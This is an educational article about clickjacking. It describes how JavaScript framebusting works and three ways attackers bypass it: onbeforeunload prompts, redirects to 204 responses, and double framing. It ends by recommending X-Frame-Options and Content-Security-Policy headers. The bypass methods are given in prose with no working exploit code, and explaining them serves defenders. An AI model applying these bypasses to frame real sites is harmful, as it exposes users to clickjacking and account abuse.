Anti-Frame Busting - Dismissing Protection Scripts


After the discovery of clickjacking in 2002, there was a need for necessary security measures to be put in place. The attack's capability to access users' webcam, steal sensitive information through cookie jacking, and trick users into making bank transfers among other things was a clear sign that protection was necessary. Clickjacking’s stealth approach required sophisticated protection technique’s to protect users as well as the organizations. This led to the introduction of framebusting a solution that would soon be circumvented by attackers. This article then looks at some of the techniques used to bypass framebusting and in this context, we refer to it as anti-framebusting.


Framebusting refers to the JavaScript technique to deny a web page from being framed by attackers. This meant that developers had to include this JavaScript code in every page they did not want to be maliciously framed either internally or externally. The typical JavaScript code would use a conditional statement to check if their page is not being framed using ‘parent. location’ and if a frame is identified the code would remove the frame and replace the top page to be their web page like: ‘parent.location=self.location’.
Simply and easy as it may seem but this defense technique was not enough soon it would be bypassed, users and organizations remain at the mercy of attackers to do whatever they please with their accounts, webcams, and computers. We now take a look at some of the techniques used by attackers to circumvent framebusting.


OnBeforeUnload event
This JavaScript handler a user to cancel a navigation request issued by a framed page. Attackers use this handler whenever their malicious frame is about to be unloaded because of navigation. They stealthily use the handler to return a string message that prompts the user to act in their favor. A typical string prompt would read: 'Are you sure you want to discard all your changes on this page?' with Cancel/OK option buttons displayed. Most likely users do not want to lose any data before saving it and would press cancel which would in turn bust the framebusting JavaScript code which is meant to protect them. This anti-framebusting technique is also very stealthy just like clickjacking because users are prompted to expose themselves to danger unknowingly.
OnBeforeUnload event using 204 ‘No Content’
In the first incident of anti-framebusting, we described a technique where the attacker asks the user politely and stealthily to bypass the framebusting protection. This is not always the case, as attackers can make use of the OnBeforeUnload handler but this time redirecting the browser to a 'No Content' URL. Chrome, Firefox, and Internet Explorer 7 & 8 allow attackers to bypass framebusting if the OnBeforeUnload handler is repeatedly redirected to a site that responds with a ‘204’ response message. This would result in the framebusting method being abandoned and the user does not realize that they under attack.
Double framing
In the above-mentioned framebusting technique, we gave an example using ‘parent.location’ and setting the location to the original legit unframed page by removing the attacker’s malicious frame like: ‘parent.location=self.location’. This works fine if the attacker only used one frame. Sophisticated techniques may enclose the web page in two frames and trying to access ‘parent.location’ is no longer permitted by most common browsers since it is a security violation according to the ‘descendant’ frame navigation policy. This violation of the policy exposes the user to under attack and is unknowingly click hijacked.


Anti-frame busting revealed that stronger methods to protect against clickjacking were necessary since JavaScript alone could not manage to protect the vulnerable public users and organizations thus the introduction of X-Frame-Options and Content-Security-Policy using HTTP headers.